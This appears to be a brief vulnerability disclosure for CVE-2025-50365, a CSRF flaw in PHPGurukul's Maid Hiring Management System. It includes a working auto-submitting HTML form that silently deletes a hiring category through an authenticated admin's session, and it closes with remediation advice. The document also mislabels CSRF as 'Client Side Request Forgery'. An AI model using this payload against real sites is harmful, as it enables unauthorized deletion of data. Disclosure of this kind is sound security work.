
PoC for CVE-2025-50365: a CSRF flaw in PHPGurukul Maid Hiring Management System allowing deletion of hiring categories via a crafted admin request.
Project Name & Repo URL: Maid Hiring Management System using PHP and MySQL
Vulnerability Type: Client Side Request Forgery
Affected Version(s): v1.0
💣Vulnerability Description: A Cross-Site Request Forgery (CSRF) vulnerability exists in the admin panel of PHPGurukul Hiring Management System, allowing an attacker to delete arbitrary hiring categories by tricking an authenticated admin into visiting a malicious site. This can lead to data deletion and unauthorized admin-level changes.
👩💻Impact: Unauthorized category deletion.
🛜Proof-of-Concept (PoC):

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recommendation: Implement of CSRF tokens in admin forms, enforce SameSite cookies, and validate request origin to prevent unauthorized actions.